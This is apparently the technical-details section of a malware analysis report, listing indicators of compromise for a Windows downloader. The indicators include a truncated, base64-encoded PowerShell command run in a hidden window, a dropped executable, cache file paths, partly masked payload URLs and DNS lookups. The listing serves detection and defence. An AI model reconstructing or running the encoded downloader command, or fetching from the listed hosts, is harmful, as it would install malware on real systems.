Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAFIAVABRAFYAZgBuAGQAPQAnAEEAQwBBAEsARAB6AG8AdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAFUAYABSAGAAaQB0AFkAYABQAFIAbwB0AG8AQwBgAE8AbAAiAC...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\162.exe
- http://in###webr.com/morgans/dQ/
- http://mi#####5.a2hosting.com/suspended.page/
- http://pl#####industries.net/signaturepics.73CA/fr238/
- http://www.bo###ereis.net/wp-includes/uY/
- DNS ASK es###tors.com
- DNS ASK im###pros.com
- DNS ASK in###webr.com
- DNS ASK mi#####5.a2hosting.com
- DNS ASK pl#####industries.net
- DNS ASK bo###ereis.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAFIAVABRAFYAZgBuAGQAPQAnAEEAQwBBAEsARAB6AG8AdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAFUAYABSAGAAaQB0AFkAYABQAFIAbwB0AG8AQwBgAE8AbAAiAC...' (with hidden window)